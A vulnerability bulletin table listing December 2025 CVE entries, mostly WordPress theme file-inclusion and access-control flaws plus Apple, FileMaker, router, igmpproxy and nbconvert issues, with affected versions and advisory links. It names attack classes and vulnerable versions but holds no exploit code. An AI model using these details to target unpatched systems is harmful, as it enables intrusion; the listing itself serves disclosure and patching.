| Apple--macOS | A logic issue was addressed with improved validation. This issue is fixed in macOS Tahoe 26.2. An app may be able to access sensitive user data. | 2025-12-17 | not yet calculated | CVE-2025-46283 | https://support.apple.com/en-us/125886 |
| Apple--iOS and iPadOS | A permissions issue was addressed with additional restrictions. This issue is fixed in visionOS 26.2, iOS 26.2 and iPadOS 26.2, watchOS 26.2, macOS Tahoe 26.2. An app may be able to access sensitive payment tokens. | 2025-12-17 | not yet calculated | CVE-2025-46288 | https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 https://support.apple.com/en-us/125890 |
| Apple--macOS | A logic issue was addressed with improved validation. This issue is fixed in macOS Tahoe 26.2. An app may bypass Gatekeeper checks. | 2025-12-17 | not yet calculated | CVE-2025-46291 | https://support.apple.com/en-us/125886 |
| Apple--iOS and iPadOS | This issue was addressed with additional entitlement checks. This issue is fixed in iOS 26.2 and iPadOS 26.2, iOS 18.7.3 and iPadOS 18.7.3. An app may be able to access user-sensitive data. | 2025-12-17 | not yet calculated | CVE-2025-46292 | https://support.apple.com/en-us/125885 https://support.apple.com/en-us/125884 |
| Claris--FileMaker Server | The IIS Shortname Vulnerability exploits how Microsoft IIS handles legacy 8.3 short filenames, allowing attackers to infer the existence of files or directories by crafting requests with the tilde (~) character. To enhance security, the FileMaker Server 22.0.4 installer now includes an option to disable 8.3 short filename creation, and with it this enumeration, by setting NtfsDisable8dot3NameCreation in the Windows registry, which prevents attackers from using the tilde character to discover hidden files and directories. This vulnerability has been fully addressed in FileMaker Server 22.0.4. | 2025-12-16 | not yet calculated | CVE-2025-46294 | https://support.claris.com/s/answerview?anum=000048450&language=en_US |
| Claris--FileMaker Server | Apache Commons Text versions prior to 1.10.0 included interpolation features that could be abused when applications passed untrusted input into the text-substitution API. Because some interpolators could trigger actions like executing commands or accessing external resources, an attacker could potentially achieve remote code execution. This vulnerability has been fully addressed in FileMaker Server 22.0.4. | 2025-12-16 | not yet calculated | CVE-2025-46295 | https://support.claris.com/s/answerview?anum=000049059&language=en_US |
| Claris--FileMaker Server | An authorization bypass vulnerability in FileMaker Server Admin Console allowed administrator roles with minimal privileges to access administrative features such as viewing license details and downloading application logs. This vulnerability has been fully addressed in FileMaker Server 22.0.4. | 2025-12-16 | not yet calculated | CVE-2025-46296 | https://support.claris.com/s/answerview?anum=000049056&language=en_US |
| The African Boss--Get Cash | Missing Authorization vulnerability in The African Boss Get Cash get-cash allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Get Cash: from n/a through <= 3.2.3. | 2025-12-18 | not yet calculated | CVE-2025-49041 | https://vdp.patchstack.com/database/Wordpress/Plugin/get-cash/vulnerability/wordpress-get-cash-plugin-3-2-3-broken-access-control-vulnerability?_s_id=cve |
| shinetheme--Traveler Option Tree | Insertion of Sensitive Information Into Sent Data vulnerability in shinetheme Traveler Option Tree custom-option-tree allows Retrieve Embedded Sensitive Data. This issue affects Traveler Option Tree: from n/a through <= 2.8. | 2025-12-16 | not yet calculated | CVE-2025-49300 | https://vdp.patchstack.com/database/Wordpress/Plugin/custom-option-tree/vulnerability/wordpress-traveler-option-tree-plugin-2-8-sensitive-data-exposure-vulnerability?_s_id=cve |
| AncoraThemes--ShieldGroup | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes ShieldGroup shieldgroup allows PHP Local File Inclusion. This issue affects ShieldGroup: from n/a through <= 2.13. | 2025-12-18 | not yet calculated | CVE-2025-49359 | https://vdp.patchstack.com/database/Wordpress/Theme/shieldgroup/vulnerability/wordpress-shieldgroup-theme-2-13-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Militarology | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Militarology militarology allows PHP Local File Inclusion. This issue affects Militarology: from n/a through <= 1.0.15. | 2025-12-18 | not yet calculated | CVE-2025-49360 | https://vdp.patchstack.com/database/Wordpress/Theme/militarology/vulnerability/wordpress-militarology-theme-1-0-15-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Mamita | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Mamita mamita allows PHP Local File Inclusion. This issue affects Mamita: from n/a through <= 1.0.9. | 2025-12-18 | not yet calculated | CVE-2025-49361 | https://vdp.patchstack.com/database/Wordpress/Theme/mamita/vulnerability/wordpress-mamita-theme-1-0-9-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Gracioza | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Gracioza gracioza allows PHP Local File Inclusion. This issue affects Gracioza: from n/a through <= 1.0.15. | 2025-12-18 | not yet calculated | CVE-2025-49362 | https://vdp.patchstack.com/database/Wordpress/Theme/gracioza/vulnerability/wordpress-gracioza-theme-1-0-15-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Kings & Queens | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Kings & Queens kings-queens allows PHP Local File Inclusion. This issue affects Kings & Queens: from n/a through <= 1.1.16. | 2025-12-18 | not yet calculated | CVE-2025-49363 | https://vdp.patchstack.com/database/Wordpress/Theme/kings-queens/vulnerability/wordpress-kings-queens-theme-1-1-16-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Ludos Paradise | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Ludos Paradise ludos-paradise allows PHP Local File Inclusion. This issue affects Ludos Paradise: from n/a through <= 2.1.3. | 2025-12-18 | not yet calculated | CVE-2025-49364 | https://vdp.patchstack.com/database/Wordpress/Theme/ludos-paradise/vulnerability/wordpress-ludos-paradise-theme-2-1-3-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Jack Well | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Jack Well jack-well allows PHP Local File Inclusion. This issue affects Jack Well: from n/a through <= 1.0.14. | 2025-12-18 | not yet calculated | CVE-2025-49365 | https://vdp.patchstack.com/database/Wordpress/Theme/jack-well/vulnerability/wordpress-jack-well-theme-1-0-14-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Hanani | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Hanani hanani allows PHP Local File Inclusion. This issue affects Hanani: from n/a through <= 1.2.11. | 2025-12-18 | not yet calculated | CVE-2025-49366 | https://vdp.patchstack.com/database/Wordpress/Theme/hanani/vulnerability/wordpress-hanani-theme-1-2-11-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Monyxi | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Monyxi monyxi allows PHP Local File Inclusion. This issue affects Monyxi: from n/a through <= 1.1.8. | 2025-12-18 | not yet calculated | CVE-2025-49367 | https://vdp.patchstack.com/database/Wordpress/Theme/monyxi/vulnerability/wordpress-monyxi-theme-1-1-8-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Palladio | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Palladio palladio allows PHP Local File Inclusion. This issue affects Palladio: from n/a through <= 1.1.10. | 2025-12-18 | not yet calculated | CVE-2025-49368 | https://vdp.patchstack.com/database/Wordpress/Theme/palladio/vulnerability/wordpress-palladio-theme-1-1-10-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Lettuce | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Lettuce lettuce allows PHP Local File Inclusion. This issue affects Lettuce: from n/a through <= 1.1.7. | 2025-12-18 | not yet calculated | CVE-2025-49369 | https://vdp.patchstack.com/database/Wordpress/Theme/lettuce/vulnerability/wordpress-lettuce-theme-1-1-7-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Lymcoin | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Lymcoin lymcoin allows PHP Local File Inclusion. This issue affects Lymcoin: from n/a through <= 1.3.12. | 2025-12-18 | not yet calculated | CVE-2025-49370 | https://vdp.patchstack.com/database/Wordpress/Theme/lymcoin/vulnerability/wordpress-lymcoin-theme-1-3-12-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Strux | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Strux strux allows PHP Local File Inclusion. This issue affects Strux: from n/a through <= 1.9. | 2025-12-18 | not yet calculated | CVE-2025-49371 | https://vdp.patchstack.com/database/Wordpress/Theme/strux/vulnerability/wordpress-strux-theme-1-9-local-file-inclusion-vulnerability?_s_id=cve |
| silverplugins217--Custom Fields Account Registration For Woocommerce | Incorrect Privilege Assignment vulnerability in silverplugins217 Custom Fields Account Registration For Woocommerce custom-fields-account-registration-for-woocommerce allows Privilege Escalation. This issue affects Custom Fields Account Registration For Woocommerce: from n/a through <= 1.2. | 2025-12-18 | not yet calculated | CVE-2025-49379 | https://vdp.patchstack.com/database/Wordpress/Plugin/custom-fields-account-registration-for-woocommerce/vulnerability/wordpress-custom-fields-account-registration-for-woocommerce-plugin-1-2-privilege-escalation-vulnerability?_s_id=cve |
| A WP Life--Login Page Customizer – Customizer Login Page, Admin Page, Custom Design | Missing Authorization vulnerability in A WP Life Login Page Customizer – Customizer Login Page, Admin Page, Custom Design customizer-login-page allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Login Page Customizer – Customizer Login Page, Admin Page, Custom Design: from n/a through <= 2.1.1. | 2025-12-18 | not yet calculated | CVE-2025-49902 | https://vdp.patchstack.com/database/Wordpress/Plugin/customizer-login-page/vulnerability/wordpress-login-page-customizer-customizer-login-page-admin-page-custom-design-plugin-2-1-1-broken-access-control-vulnerability?_s_id=cve |
| jetmonsters--Restaurant Menu by MotoPress | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in jetmonsters Restaurant Menu by MotoPress mp-restaurant-menu allows Retrieve Embedded Sensitive Data.This issue affects Restaurant Menu by MotoPress: from n/a through <= 2.4.7. | 2025-12-18 | not yet calculated | CVE-2025-49914 | https://vdp.patchstack.com/database/Wordpress/Plugin/mp-restaurant-menu/vulnerability/wordpress-restaurant-menu-by-motopress-plugin-2-4-7-sensitive-data-exposure-vulnerability?_s_id=cve |
| e4jvikwp--VikBooking Hotel Booking Engine & PMS | Insertion of Sensitive Information Into Sent Data vulnerability in e4jvikwp VikBooking Hotel Booking Engine & PMS vikbooking allows Retrieve Embedded Sensitive Data.This issue affects VikBooking Hotel Booking Engine & PMS: from n/a through <= 1.8.2. | 2025-12-18 | not yet calculated | CVE-2025-49918 | https://vdp.patchstack.com/database/Wordpress/Plugin/vikbooking/vulnerability/wordpress-vikbooking-hotel-booking-engine-pms-plugin-1-8-2-sensitive-data-exposure-vulnerability?_s_id=cve |
| WPCenter--eRoom | Insertion of Sensitive Information Into Sent Data vulnerability in WPCenter eRoom eroom-zoom-meetings-webinar allows Retrieve Embedded Sensitive Data.This issue affects eRoom: from n/a through <= 1.5.6. | 2025-12-18 | not yet calculated | CVE-2025-49919 | https://vdp.patchstack.com/database/Wordpress/Plugin/eroom-zoom-meetings-webinar/vulnerability/wordpress-eroom-plugin-1-5-6-sensitive-data-exposure-vulnerability?_s_id=cve |
| AncoraThemes--GlamChic | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes GlamChic glamchic allows PHP Local File Inclusion.This issue affects GlamChic: from n/a through <= 1.0.11. | 2025-12-18 | not yet calculated | CVE-2025-49941 | https://vdp.patchstack.com/database/Wordpress/Theme/glamchic/vulnerability/wordpress-glamchic-theme-1-0-11-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Gardis | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Gardis gardis allows PHP Local File Inclusion.This issue affects Gardis: from n/a through <= 1.2.13. | 2025-12-18 | not yet calculated | CVE-2025-49942 | https://vdp.patchstack.com/database/Wordpress/Theme/gardis/vulnerability/wordpress-gardis-theme-1-2-13-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Femme | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Femme femme allows PHP Local File Inclusion.This issue affects Femme: from n/a through <= 1.3.11. | 2025-12-18 | not yet calculated | CVE-2025-49943 | https://vdp.patchstack.com/database/Wordpress/Theme/femme/vulnerability/wordpress-femme-theme-1-3-11-local-file-inclusion-vulnerability?_s_id=cve |
| Mercury--Mercury | Mercury D196G d196gv1-cn-up_2020-01-09_11.21.44 is vulnerable to Buffer Overflow in the function sub_404CAEDC via the parameter fac_password. | 2025-12-16 | not yet calculated | CVE-2025-50398 | https://github.com/sezangel/IOT-vul/tree/main/Mercury/D196G/2 |
| Mercury--Mercury | Mercury D196G d196gv1-cn-up_2020-01-09_11.21.44 is vulnerable to Buffer Overflow in the function sub_404CAEDC via the parameter password. | 2025-12-16 | not yet calculated | CVE-2025-50401 | https://github.com/sezangel/IOT-vul/tree/main/Mercury/D196G/1 |
| igmpproxy--igmpproxy | igmpproxy 0.4 before commit 2b30c36 allows remote attackers to cause a denial of service (application crash) via a crafted IGMPv3 membership report packet with a malicious source address. Due to insufficient validation in the `recv_igmp()` function in src/igmpproxy.c, an invalid group record type can trigger a NULL pointer dereference when logging the address using `inet_fmtsrc()`. This vulnerability can be exploited by sending malformed multicast traffic to a host running igmpproxy, leading to a crash. igmpproxy is used in various embedded networking environments and consumer-grade IoT devices (such as home routers and media gateways) to handle multicast traffic for IPTV and other streaming services. Affected devices that rely on unpatched versions of igmpproxy may be vulnerable to remote denial-of-service attacks across a LAN. | 2025-12-19 | not yet calculated | CVE-2025-50681 | https://github.com/pali/igmpproxy/issues/97 https://github.com/younix/igmpproxy/commit/2b30c36e6ab5b21defb76ec6458ab7687984484c https://gist.github.com/miora-sora/dac1612d16c45c2aedb8605478adc28f |
| MicroStudio--MicroStudio | An HTML Injection vulnerability in the comment section of the project page in MicroStudio 24.01.29 allows remote attackers to inject arbitrary web script or HTML via the text parameter of the add_project_comment function. | 2025-12-15 | not yet calculated | CVE-2025-51962 | https://github.com/pmgl/microstudio/ https://github.com/Sunnyshineshow/vulnerability-research/blob/main/CVE-2025-51962/CVE-2025-51962.md |
| Ctera--Ctera | Server-Side Request Forgery (SSRF) vulnerability in Ctera Portal 8.1.x (8.1.1417.24) allows remote attackers to induce the server to make arbitrary HTTP requests via a crafted HTML file containing an iframe. | 2025-12-16 | not yet calculated | CVE-2025-52196 | https://kb.ctera.com/docs/81x-portal https://gist.github.com/simonecris/99baeb07fe6e1803d461e44031819cd3 |
| AncoraThemes--Farm Agrico | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Farm Agrico farmagrico allows PHP Local File Inclusion. This issue affects Farm Agrico: from n/a through <= 1.3.11. | 2025-12-18 | not yet calculated | CVE-2025-52745 | https://vdp.patchstack.com/database/Wordpress/Theme/farmagrico/vulnerability/wordpress-farm-agrico-theme-1-3-11-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Faith & Hope | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Faith & Hope faith-hope allows PHP Local File Inclusion. This issue affects Faith & Hope: from n/a through <= 2.13.0. | 2025-12-18 | not yet calculated | CVE-2025-52768 | https://vdp.patchstack.com/database/Wordpress/Theme/faith-hope/vulnerability/wordpress-faith-hope-theme-2-13-0-local-file-inclusion-vulnerability?_s_id=cve |
| jupyter--nbconvert | The nbconvert tool, jupyter nbconvert, converts Jupyter notebooks to various other formats via Jinja templates. Versions of nbconvert up to and including 7.16.6 on Windows have a vulnerability in which converting a notebook containing SVG output to a PDF results in unauthorized code execution. Specifically, a third party can create an `inkscape.bat` file that defines a Windows batch script capable of arbitrary code execution. When a user runs `jupyter nbconvert --to pdf` on a notebook containing SVG output on a Windows platform from the directory containing that file, the `inkscape.bat` file is run unexpectedly. As of time of publication, no known patches exist. | 2025-12-17 | not yet calculated | CVE-2025-53000 | https://www.imperva.com/blog/code-execution-in-jupyter-notebook-exports |
| Dell--Dell | The Portrait Dell Color Management application 3.3.8 for Dell monitors has Insecure Permissions. | 2025-12-17 | not yet calculated | CVE-2025-53398 | https://www.portrait.com/dell/ https://www.portrait.com/dell-security-cve-updates/ |
| AncoraThemes--Exit Game | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Exit Game exit-game allows PHP Local File Inclusion. This issue affects Exit Game: from n/a through <= 1.4.3. | 2025-12-18 | not yet calculated | CVE-2025-53429 | https://vdp.patchstack.com/database/Wordpress/Theme/exit-game/vulnerability/wordpress-exit-game-theme-1-4-3-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Etta | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Etta etta allows PHP Local File Inclusion. This issue affects Etta: from n/a through <= 1.14.0. | 2025-12-18 | not yet calculated | CVE-2025-53430 | https://vdp.patchstack.com/database/Wordpress/Theme/etta/vulnerability/wordpress-etta-theme-1-14-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Emberlyn | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Emberlyn emberlyn allows PHP Local File Inclusion. This issue affects Emberlyn: from n/a through <= 1.3.1. | 2025-12-18 | not yet calculated | CVE-2025-53431 | https://vdp.patchstack.com/database/Wordpress/Theme/emberlyn/vulnerability/wordpress-emberlyn-theme-1-3-1-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Echo | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Echo echo allows PHP Local File Inclusion. This issue affects Echo: from n/a through <= 1.15.0. | 2025-12-18 | not yet calculated | CVE-2025-53432 | https://vdp.patchstack.com/database/Wordpress/Theme/echo/vulnerability/wordpress-echo-theme-1-15-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--EasyEat | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes EasyEat easyeat allows PHP Local File Inclusion. This issue affects EasyEat: from n/a through <= 1.9.0. | 2025-12-18 | not yet calculated | CVE-2025-53433 | https://vdp.patchstack.com/database/Wordpress/Theme/easyeat/vulnerability/wordpress-easyeat-theme-1-9-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--ChildHope | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes ChildHope childhope allows PHP Local File Inclusion. This issue affects ChildHope: from n/a through <= 1.1.8. | 2025-12-18 | not yet calculated | CVE-2025-53434 | https://vdp.patchstack.com/database/Wordpress/Theme/childhope/vulnerability/wordpress-childhope-theme-1-1-8-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Plan My Day | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Plan My Day planmyday allows PHP Local File Inclusion. This issue affects Plan My Day: from n/a through <= 1.1.13. | 2025-12-18 | not yet calculated | CVE-2025-53435 | https://vdp.patchstack.com/database/Wordpress/Theme/planmyday/vulnerability/wordpress-plan-my-day-theme-1-1-13-local-file-inclusion-vulnerability?_s_id=cve |
| BZOTheme--Monki | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in BZOTheme Monki monki allows PHP Local File Inclusion. This issue affects Monki: from n/a through <= 2.0.4. | 2025-12-18 | not yet calculated | CVE-2025-53436 | https://vdp.patchstack.com/database/Wordpress/Theme/monki/vulnerability/wordpress-monki-theme-2-0-4-local-file-inclusion-vulnerability?_s_id=cve |
| ApusTheme--Greenorganic | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ApusTheme Greenorganic greenorganic allows PHP Local File Inclusion. This issue affects Greenorganic: from n/a through <= 2.45. | 2025-12-18 | not yet calculated | CVE-2025-53437 | https://vdp.patchstack.com/database/Wordpress/Theme/greenorganic/vulnerability/wordpress-greenorganic-theme-2-45-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--FitLine | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes FitLine fitline allows PHP Local File Inclusion. This issue affects FitLine: from n/a through <= 1.6. | 2025-12-18 | not yet calculated | CVE-2025-53438 | https://vdp.patchstack.com/database/Wordpress/Theme/fitline/vulnerability/wordpress-fitline-theme-1-6-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Harper | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Harper harper allows PHP Local File Inclusion. This issue affects Harper: from n/a through <= 1.13. | 2025-12-18 | not yet calculated | CVE-2025-53439 | https://vdp.patchstack.com/database/Wordpress/Theme/harper/vulnerability/wordpress-harper-theme-1-13-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Greeny | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Greeny greeny allows PHP Local File Inclusion. This issue affects Greeny: from n/a through <= 2.6. | 2025-12-18 | not yet calculated | CVE-2025-53441 | https://vdp.patchstack.com/database/Wordpress/Theme/greeny/vulnerability/wordpress-greeny-theme-2-6-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Rentic | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Rentic rentic allows PHP Local File Inclusion. This issue affects Rentic: from n/a through <= 1.1. | 2025-12-18 | not yet calculated | CVE-2025-53442 | https://vdp.patchstack.com/database/Wordpress/Theme/rentic/vulnerability/wordpress-rentic-theme-1-1-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Smash | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Smash smash allows PHP Local File Inclusion. This issue affects Smash: from n/a through <= 1.7. | 2025-12-18 | not yet calculated | CVE-2025-53443 | https://vdp.patchstack.com/database/Wordpress/Theme/smash/vulnerability/wordpress-smash-theme-1-7-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Catwalk | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Catwalk catwalk allows PHP Local File Inclusion. This issue affects Catwalk: from n/a through <= 1.4. | 2025-12-18 | not yet calculated | CVE-2025-53445 | https://vdp.patchstack.com/database/Wordpress/Theme/catwalk/vulnerability/wordpress-catwalk-theme-1-4-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Beautique | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Beautique beautique allows PHP Local File Inclusion. This issue affects Beautique: from n/a through <= 1.5. | 2025-12-18 | not yet calculated | CVE-2025-53446 | https://vdp.patchstack.com/database/Wordpress/Theme/beautique/vulnerability/wordpress-beautique-theme-1-5-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Assembly | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Assembly assembly allows PHP Local File Inclusion. This issue affects Assembly: from n/a through <= 1.1. | 2025-12-18 | not yet calculated | CVE-2025-53447 | https://vdp.patchstack.com/database/Wordpress/Theme/assembly/vulnerability/wordpress-assembly-theme-1-1-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Rally | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Rally rally allows PHP Local File Inclusion. This issue affects Rally: from n/a through <= 1.1. | 2025-12-18 | not yet calculated | CVE-2025-53448 | https://vdp.patchstack.com/database/Wordpress/Theme/rally/vulnerability/wordpress-rally-theme-1-1-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Convex | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Convex convex allows PHP Local File Inclusion. This issue affects Convex: from n/a through <= 1.11. | 2025-12-18 | not yet calculated | CVE-2025-53449 | https://vdp.patchstack.com/database/Wordpress/Theme/convex/vulnerability/wordpress-convex-theme-1-11-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Hygia | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Hygia hygia allows PHP Local File Inclusion. This issue affects Hygia: from n/a through <= 1.16. | 2025-12-18 | not yet calculated | CVE-2025-53453 | https://vdp.patchstack.com/database/Wordpress/Theme/hygia/vulnerability/wordpress-hygia-theme-1-16-local-file-inclusion-vulnerability?_s_id=cve |
| Dell--Dell | An issue was discovered in the Portrait Dell Color Management application through 3.3.008 for Dell monitors. It creates a temporary folder with weak permissions during installation and uninstallation. A low-privileged attacker with local access could potentially exploit this, leading to elevation of privileges. | 2025-12-17 | not yet calculated | CVE-2025-53919 | https://portrait.com/dell https://www.portrait.com/dell-security-cve-updates/ |
| galette--galette | Galette is a membership management web application for non-profit organizations. Starting in version 1.1.4 and prior to version 1.2.0, a user who is logged in as a group manager may bypass intended restrictions on Contributions and Transactions. Version 1.2.0 fixes the issue. | 2025-12-19 | not yet calculated | CVE-2025-53922 | https://github.com/galette/galette/security/advisories/GHSA-5jp7-5c38-3pv6 |
| WC Lovers--WCFM Frontend Manager for WooCommerce | Missing Authorization vulnerability in WC Lovers WCFM - Frontend Manager for WooCommerce wc-frontend-manager allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WCFM - Frontend Manager for WooCommerce: from n/a through <= 6.7.21. | 2025-12-16 | not yet calculated | CVE-2025-54004 | https://vdp.patchstack.com/database/Wordpress/Plugin/wc-frontend-manager/vulnerability/wordpress-wcfm-frontend-manager-for-woocommerce-plugin-6-7-21-broken-access-control-vulnerability?_s_id=cve |
| sonalsinha21--SKT Page Builder | Missing Authorization vulnerability in sonalsinha21 SKT Page Builder skt-builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects SKT Page Builder: from n/a through <= 4.9. | 2025-12-16 | not yet calculated | CVE-2025-54005 | https://vdp.patchstack.com/database/Wordpress/Plugin/skt-builder/vulnerability/wordpress-skt-page-builder-plugin-4-9-broken-access-control-vulnerability?_s_id=cve |
| CreativeMindsSolutions--CM On Demand Search And Replace | Missing Authorization vulnerability in CreativeMindsSolutions CM On Demand Search And Replace cm-on-demand-search-and-replace allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects CM On Demand Search And Replace: from n/a through <= 1.5.4. | 2025-12-16 | not yet calculated | CVE-2025-54045 | https://vdp.patchstack.com/database/Wordpress/Plugin/cm-on-demand-search-and-replace/vulnerability/wordpress-cm-on-demand-search-and-replace-plugin-1-5-4-broken-access-control-vulnerability?_s_id=cve |
| BoldThemes--DentiCare | Deserialization of Untrusted Data vulnerability in BoldThemes DentiCare denticare allows Object Injection. This issue affects DentiCare: from n/a through < 1.4.3. | 2025-12-18 | not yet calculated | CVE-2025-54723 | https://vdp.patchstack.com/database/Wordpress/Theme/denticare/vulnerability/wordpress-denticare-theme-1-4-3-php-object-injection-vulnerability?_s_id=cve |
| Tyler Moore--Super Blank | Missing Authorization vulnerability in Tyler Moore Super Blank super-blank allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Super Blank: from n/a through <= 1.2.0. | 2025-12-18 | not yet calculated | CVE-2025-54741 | https://vdp.patchstack.com/database/Wordpress/Plugin/super-blank/vulnerability/wordpress-super-blank-plugin-1-2-0-arbitrary-content-deletion-vulnerability?_s_id=cve |
| mkscripts--Download After Email | Missing Authorization vulnerability in mkscripts Download After Email download-after-email allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Download After Email: from n/a through 2.1.5-2.1.6. | 2025-12-18 | not yet calculated | CVE-2025-54743 | https://vdp.patchstack.com/database/Wordpress/Plugin/download-after-email/vulnerability/wordpress-download-after-email-plugin-2-1-5-2-1-6-other-vulnerability-type-vulnerability?_s_id=cve |
| miniOrange--miniOrange's Google Authenticator | Missing Authorization vulnerability in miniOrange miniOrange's Google Authenticator miniorange-2-factor-authentication allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects miniOrange's Google Authenticator: from n/a through <= 6.1.1. | 2025-12-18 | not yet calculated | CVE-2025-54745 | https://vdp.patchstack.com/database/Wordpress/Plugin/miniorange-2-factor-authentication/vulnerability/wordpress-miniorange-s-google-authenticator-plugin-6-1-1-broken-access-control-vulnerability?_s_id=cve |
| RomanCode--MapSVG | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in RomanCode MapSVG mapsvg allows Path Traversal. This issue affects MapSVG: from n/a through < 8.6.12. | 2025-12-18 | not yet calculated | CVE-2025-54748 | https://vdp.patchstack.com/database/Wordpress/Plugin/mapsvg/vulnerability/wordpress-mapsvg-plugin-8-6-12-arbitrary-file-download-vulnerability?_s_id=cve |
